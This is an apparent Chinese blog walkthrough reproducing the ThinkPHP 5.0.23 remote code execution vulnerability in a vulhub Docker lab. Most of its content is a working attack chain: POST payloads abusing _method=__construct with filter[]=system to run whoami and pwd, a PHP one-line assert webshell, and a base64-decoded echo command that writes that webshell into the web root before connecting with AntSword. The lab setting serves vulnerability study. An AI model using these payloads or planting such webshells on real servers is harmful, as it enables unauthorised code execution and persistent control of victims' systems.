ThinkPHP5 5.0.23远程代码执行漏洞复现

漏洞介绍

ThinkPHP5.0.23版本的漏洞:获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

进入漏洞目录/vulhub-master/thinkphp/5.0.23-rce#

启动环境

  1. 需要修改配置文件,docker-compose.yml ,将版本3.0改为2

 vi docker-compose.yml 
  1. 环境下载

环境安装 docker-compose up -d
  1. 查看镜像运行 docker-compose

漏洞复现

  1. 使用POST传参,可以使用burpsuit或者hackbar

访问 index.php?s=captcha 页面出现报错信息。

  1. 使用hackbar插件发送post请求:执行whoami命令,爆出用户信息

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
  1. 查看文件目录

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
  1. 命令执行成功,上传一句话木马

aaa<?php @assert($_POST['root']);?>bbb

需要进行base64编码,编码后内容如下红色字体,蓝色为上传的目录及文件名

echo YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3Jvb3QnXSk7Pz5iYmI= | base64 -d >>/var/www/public/1.php

上传后访问1.php,成功回显aaabbb,文件解析成功

  1. 使用蚁剑进行连接,成功访问到目录

复现成功

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值